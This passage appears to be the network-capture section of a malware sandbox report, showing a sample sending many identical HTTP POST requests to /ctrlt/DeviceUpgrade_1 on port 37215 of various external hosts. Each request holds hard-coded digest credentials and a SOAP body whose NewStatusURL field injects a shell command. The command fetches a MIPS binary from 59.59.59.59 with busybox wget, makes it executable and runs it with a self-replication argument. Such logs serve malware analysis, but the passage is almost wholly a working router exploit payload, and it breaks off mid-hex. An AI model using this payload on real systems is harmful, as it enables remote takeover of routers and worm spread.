                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2197192.168.2.153650441.82.83.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152875900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2198192.168.2.1554978157.204.144.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152893066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2199192.168.2.1554842179.221.141.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152918100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2200192.168.2.1553678102.229.150.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152981043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2201192.168.2.155784091.167.42.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152998924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2202192.168.2.1536032197.206.179.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.153018951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2203192.168.2.1559564157.120.243.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.153203964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2204192.168.2.1544824197.114.143.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.153214931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2205192.168.2.1541900197.41.141.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.153229952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2206192.168.2.1538476157.105.171.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.158751011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 